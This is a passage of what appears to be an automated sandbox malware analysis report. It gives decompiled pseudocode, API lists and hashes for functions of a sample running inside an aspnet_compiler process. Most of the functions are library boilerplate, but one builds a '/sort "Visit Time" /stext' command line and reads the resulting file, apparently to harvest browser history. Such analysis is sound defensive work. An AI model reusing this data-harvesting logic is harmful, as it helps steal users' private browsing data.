								}
								Sleep(0x2710);
							}
							_t9 = CloseHandle(_t23);
						}
					} while ( *((char*)(_t24 + 0x39)) == 1);
					if( *((intOrPtr*)(_t24 + 0x49)) == 0) {
						_t35 =  *0x46f9d4 - 0x31;
						if( *0x46f9d4 == 0x31) {
							E004086D0(0, _t25 - 0x18, _t22, _t35, _t24 + 0x60);
							return E0040977E(_t24, _t22);
						}
					}
				}
				return _t9;
			}











                0x00409be8
                0x00409bed
                0x00409bf6
                0x00409bf8
                0x00409c00
                0x00409c03
                0x00409c1e
                0x00409c24
                0x00409c29
                0x00409c69
                0x00409c2b
                0x00409c2d
                0x00409c33
                0x00409c39
                0x00409c45
                0x00409c4c
                0x00409c50
                0x00409c50
                0x00409c5a
                0x00409c5a
                0x00409c61
                0x00409c61
                0x00409c6c
                0x00409c75
                0x00409c77
                0x00409c7e
                0x00409c89
                0x00000000
                0x00409c90
                0x00409c7e
                0x00409c75
                0x00409c98

                APIs
                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409CC0), ref: 00409C1E
                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409CC0), ref: 00409C2D
                • Sleep.KERNEL32(00002710,?,?,?,00409CC0), ref: 00409C5A
                • CloseHandle.KERNEL32(00000000,?,?,?,00409CC0), ref: 00409C61
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: File$CloseCreateHandleSizeSleep
                • String ID:
                • API String ID: 1958988193-0
                • Opcode ID: 50d1c0447dad42618e748a365bc43df3760a561be73cff881b0354591b1b06b9
                • Instruction ID: 776417b5dd6b277b78666ee6a0049f3b3f0777a2ef627118506dbb8d74d8395d
                • Opcode Fuzzy Hash: 50d1c0447dad42618e748a365bc43df3760a561be73cff881b0354591b1b06b9
                • Instruction Fuzzy Hash: 2C11EB306487C07AF721AB34A8C9A2F3ADEA745705F04447FF187661D3C6799D84831D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00446DE6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 95%
                			E00446DE6(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x470668 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x45cc40 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0xd60a1516
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                0x00446deb
                0x00446def
                0x00446df6
                0x00446dfa
                0x00446e08
                0x00446e1e
                0x00446e22
                0x00446e4b
                0x00446e4d
                0x00446e51
                0x00446e54
                0x00446e54
                0x00446e5a
                0x00446e5c
                0x00000000
                0x00446e5d
                0x00446e24
                0x00446e2d
                0x00446e3c
                0x00446e2f
                0x00446e32
                0x00446e38
                0x00446e38
                0x00446e40
                0x00000000
                0x00446e42
                0x00446e45
                0x00446e47
                0x00000000
                0x00446e47
                0x00446e40
                0x00446dfc
                0x00446e01
                0x00000000

                APIs
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00446D8D,00000000,00000000,00000000,00000000,?,004470B9,00000006,FlsSetValue), ref: 00446E18
                • GetLastError.KERNEL32(?,00446D8D,00000000,00000000,00000000,00000000,?,004470B9,00000006,FlsSetValue,0045D130,0045D138,00000000,00000364,?,00446B67), ref: 00446E24
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00446D8D,00000000,00000000,00000000,00000000,?,004470B9,00000006,FlsSetValue,0045D130,0045D138,00000000), ref: 00446E32
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID:
                • API String ID: 3177248105-0
                • Opcode ID: a5304e2d2fd2594c12811dfafb94f311b8e24b7740d385cabe09339be51067e1
                • Instruction ID: 7cfac10879522bcf09d0363c87617103b1842d1ca64a55dff1d48b8732c2297d
                • Opcode Fuzzy Hash: a5304e2d2fd2594c12811dfafb94f311b8e24b7740d385cabe09339be51067e1
                • Instruction Fuzzy Hash: 7901F73A2063229BD7214B79EC44A573BD9AF06F62B320231F91AD7241D724D801C6ED
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041ADFE Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0041ADFE(void* __edx) {
				long _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __ebp;
				struct _OVERLAPPED* _t12;
				WCHAR* _t13;
				void* _t17;
				long _t19;
				void* _t21;

				_t12 = 0;
				_t21 = __edx;
				_t17 = CreateFileW(_t13, 0x80000000, 3, 0, 3, 0x80, 0);
				if(_t17 != 0xffffffff) {
					_t19 = GetFileSize(_t17, 0);
					E0040242E(0, _t21, _t17, _t21, _t19, 0);
					_v12 = 0;
					if(ReadFile(_t17, E00401F8B(_t21), _t19,  &_v12, 0) != 0) {
						_t12 = 1;
					}
					CloseHandle(_t17);
					return _t12;
				}
				return 0;
			}













                0x0041ae02
                0x0041ae04
                0x0041ae1d
                0x0041ae22
                0x0041ae31
                0x0041ae37
                0x0041ae41
                0x0041ae59
                0x0041ae5b
                0x0041ae5b
                0x0041ae5e
                0x00000000
                0x0041ae64
                0x00000000

                APIs
                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409DB6), ref: 0041AE17
                • GetFileSize.KERNEL32(00000000,00000000), ref: 0041AE2B
                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041AE50
                • CloseHandle.KERNEL32(00000000), ref: 0041AE5E
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: File$CloseCreateHandleReadSize
                • String ID:
                • API String ID: 3919263394-0
                • Opcode ID: 442c9d8ecbfc2981eb1d44de6e8e3768176206f0722ce75e894edeb3ed96a232
                • Instruction ID: 3f0c34db4874b28da9e92ecf7e139d0848c3339cd4cea530d57336cc45ca2017
                • Opcode Fuzzy Hash: 442c9d8ecbfc2981eb1d44de6e8e3768176206f0722ce75e894edeb3ed96a232
                • Instruction Fuzzy Hash: 1BF0C2B52462087FE6111B21BC84FBF379CDB867A9F10067EFD02A22C1CA658D054536
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00438160 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 19%
                			E00438160(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t27;
				void* _t28;
				void* _t29;
				intOrPtr _t30;
				intOrPtr* _t32;
				void* _t34;

				_t29 = __edx;
				_t27 = __ebx;
				_t36 = _a28;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E004387AF(_t36);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E00437C87(_t28);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
				E004389B1(_t27, _t28, _t29, _t30, _t37);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E00437F6A(_t29, _t32, _t37);
				if(_t25 != 0) {
					E00437C55(_t25, _t30);
					return _t25;
				}
				return _t25;
			}













                0x00438160
                0x00438160
                0x00438163
                0x00438168
                0x0043816b
                0x0043816d
                0x00438170
                0x00438173
                0x00438174
                0x00438177
                0x0043817c
                0x0043817c
                0x0043817f
                0x00438183
                0x00438186
                0x0043818b
                0x00438188
                0x00438188
                0x00438188
                0x0043818e
                0x00438194
                0x00438197
                0x00438199
                0x0043819c
                0x0043819f
                0x004381a0
                0x004381a9
                0x004381ae
                0x004381b1
                0x004381b7
                0x004381ba
                0x004381bd
                0x004381c0
                0x004381c1
                0x004381c4
                0x004381cf
                0x004381d3
                0x00000000
                0x004381d3
                0x004381da

                APIs
                • ___BuildCatchObject.LIBVCRUNTIME ref: 00438177
                  • Part of subcall function 004387AF: ___AdjustPointer.LIBCMT ref: 004387F9
                • _UnwindNestedFrames.LIBCMT ref: 0043818E
                • ___FrameUnwindToState.LIBVCRUNTIME ref: 004381A0
                • CallCatchBlock.LIBVCRUNTIME ref: 004381C4
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                • String ID:
                • API String ID: 2633735394-0
                • Opcode ID: bf861bfba03100e0359afbe7af2fd9297d541e05f4b4e03a7557866a70e7ae05
                • Instruction ID: b80c8dfee50a01e3efcc98067a7db4f6d443bb63a6d24abc5b8fd2fcc045c81f
                • Opcode Fuzzy Hash: bf861bfba03100e0359afbe7af2fd9297d541e05f4b4e03a7557866a70e7ae05
                • Instruction Fuzzy Hash: F1011732000209BBCF125F56CC01EEB7BBAFF4C714F14511AF95866220D73AE8629BA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00417F42 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00417F42(intOrPtr _a4, intOrPtr _a8) {
				int _v4;
				void* __ecx;
				int _t9;
				void* _t13;
				int _t26;
				int _t29;

				_t9 = GetSystemMetrics(0x4c);
				_t26 = GetSystemMetrics(0x4d);
				_t29 = GetSystemMetrics(0x4e);
				_v4 = GetSystemMetrics(0x4f);
				if(_t9 < 0) {
					_a4 = _a4 + E00417482();
				}
				if(_t26 < 0) {
					_a8 = _a8 + E00417482();
				}
				_t13 = E00417FA9(_a4, _t29);
				E00417FA9(_a8, _v4);
				return _t13;
			}









                0x00417f4f
                0x00417f59
                0x00417f5f
                0x00417f63
                0x00417f69
                0x00417f72
                0x00417f72
                0x00417f78
                0x00417f81
                0x00417f81
                0x00417f8b
                0x00417f9a
                0x00417fa8

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: MetricsSystem
                • String ID:
                • API String ID: 4116985748-0
                • Opcode ID: 52ae23f17ebd3a8b63732ffffa837f2ae29638f7e606c1416d1229424adc30c0
                • Instruction ID: db9294b6453bfed66dbe03807c9cf0078fbbbbfeeb63ddf2ed7e0e7c3359cc27
                • Opcode Fuzzy Hash: 52ae23f17ebd3a8b63732ffffa837f2ae29638f7e606c1416d1229424adc30c0
                • Instruction Fuzzy Hash: 85F0AFB1B483165FD700EFB69C45A6B7AE59BD42A4F10043FF608C7281EEACDC458B84
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00437801 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00437801() {
				void* _t4;
				void* _t8;

				E00438C10();
				E00437795();
				if(E00438D37() != 0) {
					_t4 = E00438CE9(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00438D73();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                0x00437801
                0x00437806
                0x00437812
                0x00437817
                0x0043781c
                0x0043781e
                0x00437829
                0x00437820
                0x00437820
                0x00000000
                0x00437820
                0x00437814
                0x00437814
                0x00437816
                0x00437816

                APIs
                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00437801
                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00437806
                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 0043780B
                  • Part of subcall function 00438D37: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00438D48
                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00437820
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                • String ID:
                • API String ID: 1761009282-0
                • Opcode ID: 9269abf3446c0c407ed1a2d4036da59c5190ee49ce07a04b16f4a94a6885d453
                • Instruction ID: 44b38c586fa46ca64db38af4dc09b646a72d0231a99fa094af013a7d49b3c72a
                • Opcode Fuzzy Hash: 9269abf3446c0c407ed1a2d4036da59c5190ee49ce07a04b16f4a94a6885d453
                • Instruction Fuzzy Hash: 5DC00298409781141D383A7311461AE93002C6E3CDF8078DFFAE0175435D0E140B957E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0044152D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                Download Yara Rule
                APIs
                • __startOneArgErrorHandling.LIBCMT ref: 004415BD
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ErrorHandling__start
                • String ID: pow
                • API String ID: 3213639722-2276729525
                • Opcode ID: ad63ff09f6cf6b628e32c74312707c4078ff81d5a8f2d6bafb9ca103f79419f4
                • Instruction ID: 9bdf7c23e7d16313cb1f45f597b7cc27bb5148f7337d60067ed22a22280059c4
                • Opcode Fuzzy Hash: ad63ff09f6cf6b628e32c74312707c4078ff81d5a8f2d6bafb9ca103f79419f4
                • Instruction Fuzzy Hash: C4514C61E06201A7F7517714C9813BB2B94DB80741F28896BF0D6823BAEB3DCCD59E4E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00420387 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                Download Yara Rule
                C-Code - Quality: 59%
                			E00420387(void* __ecx) {
				signed int _t92;
				signed int _t93;
				intOrPtr _t94;
				signed int _t95;
				signed int _t96;
				void* _t100;
				signed int _t124;
				signed int _t130;
				signed int _t134;
				void* _t142;
				signed int _t148;
				void* _t151;
				signed int _t153;
				signed int _t154;
				signed int _t162;
				signed int _t165;
				signed int _t166;
				signed int _t169;
				signed int _t172;
				signed int _t174;
				signed int _t175;
				signed int* _t177;
				signed int* _t178;
				signed int* _t179;
				signed int* _t180;

				 *_t177 =  *_t177 & 0x00000000;
				_t142 = __ecx;
				_t92 =  *(__ecx + 0x310) & 0x0000ffff;
				if((_t92 & 0x00000004) == 0) {
					if((_t92 & 0x00001000) == 0) {
						goto L1;
					}
					_t94 =  *((intOrPtr*)(__ecx + 8));
					if(_t94 == 0) {
						L26:
						_t93 = 0xffffff53;
						L27:
						return _t93;
					}
					_t95 = _t94 + 0x54;
					_t177[6] = _t95;
					if(_t95 == 0) {
						goto L26;
					}
					_push( &(_t177[3]));
					_t96 = E0042035E(_t95, 0x20);
					_t169 = _t177[4];
					_t148 = 0xb;
					_t165 = _t96 % _t148;
					_t177[7] = _t165;
					if(_t169 == 0) {
						if(E00432AE1(0x474a44) == 0) {
							_t174 = 0;
							_t166 = _t165 * 0x170;
							_t177[5] = 0;
							_t16 = _t166 + 0x473990; // 0x473990
							_t99 = _t16;
							_t177[6] = _t16;
							while(1) {
								_t100 = E004358BA(_t177[9], _t99, 0x20);
								_t177 =  &(_t177[3]);
								if(_t100 == 0) {
									break;
								}
								_t174 = _t174 + 1;
								_t99 = _t177[6] + 0x78;
								_t177[5] = _t174;
								_t177[6] = _t177[6] + 0x78;
								if(_t174 < 3) {
									continue;
								}
								_t174 =  *(_t166 + 0x473980);
								_t177[5] = _t174;
								 *(_t166 + 0x473980) = _t174 + 1;
								break;
							}
							_t175 = _t174 * 0x78;
							_push(0x30);
							if( *(_t142 + 0x310) < 0x8000) {
								_push( *((intOrPtr*)(_t142 + 8)) + 0xa5);
								_t32 = _t166 + 0x4739b1; // 0x4739b1
								_push(_t32 + _t175);
								E004351E0();
								 *((char*)(_t166 + _t175 + 0x4739b0)) =  *((intOrPtr*)( *((intOrPtr*)(_t142 + 8)) + 0x74));
							} else {
								_push(_t142 + 0x199);
								_t28 = _t166 + 0x4739b1; // 0x4739b1
								_push(_t28 + _t175);
								E004351E0();
								 *((char*)(_t166 + _t175 + 0x4739b0)) = 0x20;
							}
							_t178 =  &(_t177[3]);
							_t37 = _t166 + 0x473990; // 0x473990
							E004351E0(_t37 + _t175, _t178[8], 0x20);
							_t179 =  &(_t178[3]);
							 *(_t166 + _t175 + 0x4739e2) =  *(_t142 + 0x314) >> 0x00000009 & 0x00000001;
							 *((intOrPtr*)(_t166 + _t175 + 0x47398c)) =  *((intOrPtr*)(_t142 + 0x20c));
							 *((intOrPtr*)(_t166 + _t175 + 0x473988)) = E0041D039(0x474a44);
							 *((char*)(_t166 + _t175 + 0x4739e4)) =  *((intOrPtr*)(_t142 + 0x317));
							 *((char*)(_t166 + _t175 + 0x4739e5)) =  *((intOrPtr*)(_t142 + 0x318));
							 *((short*)(_t166 + _t175 + 0x4739fc)) =  *((intOrPtr*)(_t142 + 0x1e4));
							 *((intOrPtr*)(_t166 + 0x473984)) =  *((intOrPtr*)(_t166 + 0x473984)) + 1;
							if( *(_t166 + 0x473980) == 3) {
								 *(_t166 + 0x473980) =  *(_t166 + 0x473980) & 0x00000000;
							}
							if(( *(_t142 + 0x310) & 0x00000030) != 0x10) {
								L25:
								 *(_t166 + _t175 + 0x4739e6) = 0;
								goto L24;
							} else {
								_t124 =  *(_t142 + 0x1ce) & 0x0000ffff;
								if(_t124 == 0) {
									goto L25;
								}
								 *(_t166 + _t175 + 0x4739e6) = _t124;
								_t67 = _t166 + 0x4739e8; // 0x4739e8
								E004351E0(_t67 + _t175, _t142 + 0x1d0,  *(_t142 + 0x1ce) & 0x0000ffff);
								_t130 = E0042035E(_t142 + 0x1d0,  &(_t179[7]));
								_t169 = _t179[8];
								_t180 =  &(_t179[4]);
								_t153 = 0xb;
								_t162 = _t130 % _t153;
								if(_t169 == 0) {
									_t172 = _t162 * 0x14;
									_t154 =  *(_t172 + 0x474950);
									 *(_t172 + 0x474950) = _t154 + 1;
									_t134 = _t162 * 5 + _t154;
									 *((short*)(0x474958 + _t134 * 4)) = _t180[8];
									 *((short*)(0x47495a + _t134 * 4)) = _t180[5];
									 *((intOrPtr*)(_t172 + 0x474954)) =  *((intOrPtr*)(_t172 + 0x474954)) + 1;
									if( *(_t172 + 0x474950) == 3) {
										 *(_t172 + 0x474950) =  *(_t172 + 0x474950) & 0x00000000;
									}
									_t169 = _t180[4];
								}
								L24:
								E00432AEB(0x474a44);
								_t151 = 0xffffff96;
								_t170 =  !=  ? _t151 : _t169;
								_t93 =  !=  ? _t151 : _t169;
								goto L27;
							}
						}
						_t93 = 0xffffff96;
						goto L27;
					}
					_t93 = _t169;
					goto L27;
				}
				L1:
				_t93 = 0;
				goto L27;
			}




























                0x0042038a
                0x0042038f
                0x00420393
                0x0042039c
                0x004203aa
                0x00000000
                0x00000000
                0x004203ac
                0x004203b1
                0x0042060d
                0x0042060d
                0x00420612
                0x00420618
                0x00420618
                0x004203b7
                0x004203ba
                0x004203be
                0x00000000
                0x00000000
                0x004203c8
                0x004203ce
                0x004203d8
                0x004203dc
                0x004203df
                0x004203e1
                0x004203e7
                0x004203fc
                0x00420407
                0x00420409
                0x0042040f
                0x00420413
                0x00420413
                0x00420419
                0x0042041d
                0x00420424
                0x00420429
                0x0042042e
                0x00000000
                0x00000000
                0x00420434
                0x00420435
                0x00420438
                0x0042043c
                0x00420443
                0x00000000
                0x00000000
                0x00420445
                0x0042044b
                0x00420452
                0x00000000
                0x00420452
                0x0042045d
                0x00420460
                0x00420469
                0x00420492
                0x00420493
                0x0042049b
                0x0042049c
                0x004204a7
                0x0042046b
                0x00420471
                0x00420472
                0x0042047a
                0x0042047b
                0x00420480
                0x00420480
                0x004204ae
                0x004204b1
                0x004204c0
                0x004204cc
                0x004204d7
                0x004204e5
                0x004204f1
                0x004204fe
                0x0042050b
                0x00420519
                0x00420521
                0x0042052e
                0x00420530
                0x00420530
                0x00420541
                0x00420601
                0x00420603
                0x00000000
                0x00420547
                0x00420547
                0x00420551
                0x00000000
                0x00000000
                0x00420557
                0x0042056d
                0x00420577
                0x0042058a
                0x0042058f
                0x00420593
                0x0042059a
                0x0042059b
                0x0042059f
                0x004205a1
                0x004205a4
                0x004205ad
                0x004205b6
                0x004205bc
                0x004205c8
                0x004205d0
                0x004205dd
                0x004205df
                0x004205df
                0x004205e6
                0x004205e6
                0x004205ea
                0x004205ef
                0x004205f8
                0x004205f9
                0x004205fc
                0x00000000
                0x004205fe
                0x00420541
                0x00420400
                0x00000000
                0x00420400
                0x004203e9
                0x00000000
                0x004203e9
                0x0042039e
                0x0042039e
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: DJG$DJG
                • API String ID: 0-3553971598
                • Opcode ID: e8c7b146054ac432a77ccc8b031f1909a635b70973a3760844eb4ba0b5c61c59
                • Instruction ID: f2201e53aae1a578f399186880d4f81f94f4690d310475270f371cf99ab1fffa
                • Opcode Fuzzy Hash: e8c7b146054ac432a77ccc8b031f1909a635b70973a3760844eb4ba0b5c61c59
                • Instruction Fuzzy Hash: 8861F0F16046569BC704DF28D8017A6F7E4FF84304F04052EED9C8B346E778AA64DBAA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040402C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON
                Download Yara Rule
                C-Code - Quality: 90%
                			E0040402C(void* __ebx) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				short _v692;
				void* __edi;
				void* __ebp;
				struct HINSTANCE__* _t81;
				struct HINSTANCE__* _t84;
				void* _t85;
				void* _t86;

				_t48 = __ebx;
				_t81 = 0;
				GetModuleFileNameW(0,  &_v692, 0x104);
				E004020BF(__ebx,  &_v52);
				E0040CEEC( &_v28, 0x30, E00401F8B(E0041A4D3( &_v76)));
				E00401FB8();
				E00401F8B(0x472e18);
				E00417456(E00401EE4(E00402FF4(_t48,  &_v100, E004042FD(_t48,  &_v124, E004042DC(_t48,  &_v148,  &_v692, _t85, 0, E0040415E(__ebx,  &_v172, 0x30, _t85, L" /sort \"Visit Time\" /stext \"")), _t85, 0,  &_v28), 0, _t85, 0, "\"")));
				E00401EE9();
				E00401EE9();
				E00401EE9();
				E00401EE9();
				_t84 = 0;
				while(1) {
					E00401EE4( &_v28);
					_t80 =  &_v52;
					if(E0041ADFE( &_v52) != 0) {
						break;
					}
					Sleep(0xfa);
					_t84 =  &(_t84->i);
					if(_t84 < 0x14) {
						continue;
					} else {
					}
					L5:
					E00401EE9();
					E00401FB8();
					return _t81;
				}
				E004020D6(_t48, _t86 - 0x18,  &_v52, __eflags,  &_v52);
				_push(0x9d);
				E00404A81(0x472d98, _t80, __eflags);
				_t81 = 1;
				__eflags = 1;
				goto L5;
			}

















                0x0040402c
                0x00404043
                0x00404046
                0x0040404f
                0x00404069
                0x00404072
                0x0040407c
                0x004040d0
                0x004040d8
                0x004040e0
                0x004040eb
                0x004040f6
                0x004040fb
                0x004040fd
                0x00404100
                0x00404105
                0x00404111
                0x00000000
                0x00000000
                0x00404118
                0x0040411e
                0x00404122
                0x00000000
                0x00000000
                0x00404124
                0x00404146
                0x00404149
                0x00404151
                0x0040415d
                0x0040415d
                0x0040412f
                0x00404134
                0x0040413e
                0x00404145
                0x00404145
                0x00000000

                APIs
                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404046
                  • Part of subcall function 0041A4D3: GetCurrentProcessId.KERNEL32(00000000,7476FBB0,00000000,?,?,?,?,0046A8F0,0040C716,.vbs,?,?,?,?,?,00473238), ref: 0041A4FA
                  • Part of subcall function 00417456: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00463E44), ref: 0041746C
                  • Part of subcall function 00417456: CloseHandle.KERNEL32(D>F,?,?,004040D5,00463E44), ref: 00417475
                  • Part of subcall function 0041ADFE: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409DB6), ref: 0041AE17
                • Sleep.KERNEL32(000000FA,00463E44), ref: 00404118
                Strings
                • /sort "Visit Time" /stext ", xrefs: 00404092
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                • String ID: /sort "Visit Time" /stext "
                • API String ID: 368326130-1573945896
                • Opcode ID: 4f1a34a24bae5ba4efafafe93aad2e7791b4a511ca70f5422c5f56995e8fd322
                • Instruction ID: 0b16387c6f9edcb84504e01d0cc383686463f04b1c5a299ba0a956b40ef645a0
                • Opcode Fuzzy Hash: 4f1a34a24bae5ba4efafafe93aad2e7791b4a511ca70f5422c5f56995e8fd322
                • Instruction Fuzzy Hash: B7318431A0021957CB14FBA6DC969EE7779AF90308F40017FF506B71D2EF38598ACA99
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004503B7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 93%
                			E004503B7(void* __ecx, signed int _a4, intOrPtr _a8) {
				int _v8;
				void* __esi;
				int _t15;
				int _t16;
				signed int _t17;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t36;

				_push(__ecx);
				_t23 = _a4;
				_push(_t34);
				if(_t23 == 0) {
					L21:
					_t15 = E0044716D(_t23, _t34, __eflags, _a8 + 0x250, 0x20001004,  &_v8, 2);
					__eflags = _t15;
					if(_t15 != 0) {
						_t16 = _v8;
						__eflags = _t16;
						if(_t16 == 0) {
							_t16 = GetACP();
						}
						L25:
						return _t16;
					}
					L22:
					_t16 = 0;
					goto L25;
				}
				_t17 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t34 = 0x45e318;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t34) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t17;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t36 = 0x45e320;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t36) {
								break;
							}
							if(_t31 == 0) {
								L17:
								_t48 = _t17;
								if(_t17 != 0) {
									_t16 = E0043A382(_t23, _t23);
									goto L25;
								}
								if(E0044716D(_t23, _t36, _t48, _a8 + 0x250, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t16 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t36 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t36 = _t36 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t17 = _t17 | 0x00000001;
						__eflags = _t17;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
